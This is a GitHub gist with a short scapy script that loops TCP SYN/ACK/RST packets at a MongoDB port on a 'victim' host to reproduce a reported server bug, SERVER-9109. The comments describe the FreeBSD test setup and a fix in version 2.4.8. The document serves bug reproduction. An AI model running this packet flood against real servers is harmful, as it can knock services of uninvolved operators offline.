Created
December 9, 2013 09:33
-
-
Save darkk/7869676 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # scapy script to trigger bug in mongod / mongos: https://jira.mongodb.org/browse/SERVER-9109 | |
| # | |
| # Do $(iptables -I INPUT -p tcp --dport 12345 -j DROP) at vm host before flooding. | |
| vm = '1.2.3.4' # src | |
| victim = '9.8.7.6' # dst | |
| def f(): | |
| syn = IP(src=vm, dst=victim)/TCP(sport=12345, dport=27017, flags="S") | |
| sa = sr1(syn) | |
| ack = IP(src=vm, dst=victim)/TCP(sport=12345, dport=27017, seq=sa.ack, ack=sa.seq+1, flags="A") | |
| rst = IP(src=vm, dst=victim)/TCP(sport=12345, dport=27017, seq=sa.ack, ack=sa.seq+1, flags="RA") | |
| send([ack, rst]) | |
| while True: f() |
I confirm, I can't reproduce the bug with 2.4.8 anymore.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
@dannenberg
vmis Linux qemu-kvm based virtual machine, that I launched nearby thevictim(same datacentre, I used vm as it was trivial to set up).victimis FreeBSD-9 host running mongod. I could not reproduce the issue with Linux host using same script. I've not looked if Linux kernel can return ECONNABORTED from accept()The script is run at
vmafter setting up iptables to drop some packets (to prevent possible replies from Linux TCP/IP stack).I plan to upgrade my FreeBSD instances to 2.4.8 next Monday, I'll be able to tell if the bug is fixed for me.
Matt, excuse me for late reply, github generated no notifications about your comment :(